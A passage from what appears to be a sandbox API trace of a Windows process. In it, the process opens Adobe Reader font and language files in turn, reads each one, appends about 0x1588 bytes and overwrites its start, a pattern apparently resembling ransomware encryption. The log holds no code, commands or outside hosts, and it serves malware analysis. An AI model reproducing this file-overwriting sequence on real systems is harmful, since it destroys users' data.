lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x113b8 [0096.389] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.389] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.389] ReleaseMutex (hMutex=0x168) returned 1 [0096.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeThai-Italic.otf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0096.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeThai-Italic.otf", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeThai-Italic.otf", lpUsedDefaultChar=0x0) returned 20 [0096.390] ReadFile (in: hFile=0x1cc, lpBuffer=0x2870988, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0096.403] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x103b8 [0096.403] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.411] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x103b8 [0096.411] WriteFile (in: hFile=0x1cc, lpBuffer=0x2870988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.411] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0096.412] WriteFile (in: hFile=0x1cc, lpBuffer=0x2870988*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0096.412] CloseHandle (hObject=0x1cc) returned 1 [0096.412] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-It.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-it.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0096.413] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.413] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x436ac [0096.413] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.413] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.413] ReleaseMutex (hMutex=0x168) returned 1 [0096.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MinionPro-It.otf", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MinionPro-It.otf", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MinionPro-It.otf", lpUsedDefaultChar=0x0) returned 16 [0096.413] ReadFile (in: hFile=0x1cc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0096.806] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x426ac [0096.806] ReadFile (in: hFile=0x1cc, lpBuffer=0x26956e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.818] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x426ac [0096.819] WriteFile (in: hFile=0x1cc, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.819] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0096.819] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0096.836] CloseHandle (hObject=0x1cc) returned 1 [0096.837] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zy______.pfm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zy______.pfm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0096.837] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.838] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2ac [0096.838] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.838] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.838] ReleaseMutex (hMutex=0x168) returned 1 [0096.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zy______.pfm", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zy______.pfm", cchWideChar=12, lpMultiByteStr=0x1f7356c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zy______.pfm", lpUsedDefaultChar=0x0) returned 12 [0096.838] ReadFile (in: hFile=0x1cc, lpBuffer=0x2695708, nNumberOfBytesToRead=0x2ac, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2695708*, lpNumberOfBytesRead=0x2e9f2bc*=0x2ac, lpOverlapped=0x0) returned 1 [0096.839] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0096.839] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3978*, nNumberOfBytesToWrite=0x834, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesWritten=0x2e9f2d0*=0x834, lpOverlapped=0x0) returned 1 [0096.840] CloseHandle (hObject=0x1cc) returned 1 [0096.840] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_EG.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_eg.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0096.841] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.841] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6c96 [0096.841] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.841] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.841] ReleaseMutex (hMutex=0x168) returned 1 [0096.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_EG.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0096.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_EG.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_EG.txt", lpUsedDefaultChar=0x0) returned 30 [0096.841] ReadFile (in: hFile=0x1cc, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.847] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5c96 [0096.847] ReadFile (in: hFile=0x1cc, lpBuffer=0x2870988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.888] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5c96 [0096.888] WriteFile (in: hFile=0x1cc, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.889] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0096.889] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0096.889] CloseHandle (hObject=0x1cc) returned 1 [0096.889] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_OM.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_om.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0096.890] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.890] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6c96 [0096.891] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.891] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.891] ReleaseMutex (hMutex=0x168) returned 1 [0096.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_OM.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0096.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_OM.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_OM.txt", lpUsedDefaultChar=0x0) returned 30 [0096.891] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.916] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5c96 [0096.916] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.924] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5c96 [0096.924] WriteFile (in: hFile=0x1cc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.925] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0096.928] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0096.928] CloseHandle (hObject=0x1cc) returned 1 [0096.928] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg_BG.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg_bg.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0096.929] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.929] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6cde [0096.929] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.929] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.930] ReleaseMutex (hMutex=0x168) returned 1 [0096.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.bg_BG.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0096.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.bg_BG.txt", cchWideChar=30, lpMultiByteStr=0x1f8fedc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.bg_BG.txt", lpUsedDefaultChar=0x0) returned 30 [0096.930] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.937] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5cde [0096.937] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.943] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5cde [0096.943] WriteFile (in: hFile=0x1cc, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.944] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0096.944] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0096.944] CloseHandle (hObject=0x1cc) returned 1 [0096.944] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_CH.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_ch.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0096.945] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.945] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x72d6 [0096.945] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.945] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.945] ReleaseMutex (hMutex=0x168) returned 1 [0096.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.de_CH.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0096.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.de_CH.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.de_CH.txt", lpUsedDefaultChar=0x0) returned 30 [0096.946] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.960] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x62d6 [0096.960] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.987] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x62d6 [0096.987] WriteFile (in: hFile=0x1cc, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.987] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0096.987] WriteFile (in: hFile=0x1cc, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0096.987] CloseHandle (hObject=0x1cc) returned 1 [0096.988] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB_EURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb_euro.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0096.989] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.989] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6e88 [0096.989] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.989] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.989] ReleaseMutex (hMutex=0x168) returned 1 [0096.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.en_GB_EURO.txt", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0096.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.en_GB_EURO.txt", cchWideChar=35, lpMultiByteStr=0x1fa55f4, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.en_GB_EURO.txt", lpUsedDefaultChar=0x0) returned 35 [0096.989] ReadFile (in: hFile=0x1cc, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.070] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5e88 [0097.070] ReadFile (in: hFile=0x1cc, lpBuffer=0x2870988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.084] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5e88 [0097.085] WriteFile (in: hFile=0x1cc, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.086] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0097.086] WriteFile (in: hFile=0x1cc, lpBuffer=0x2870988*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, 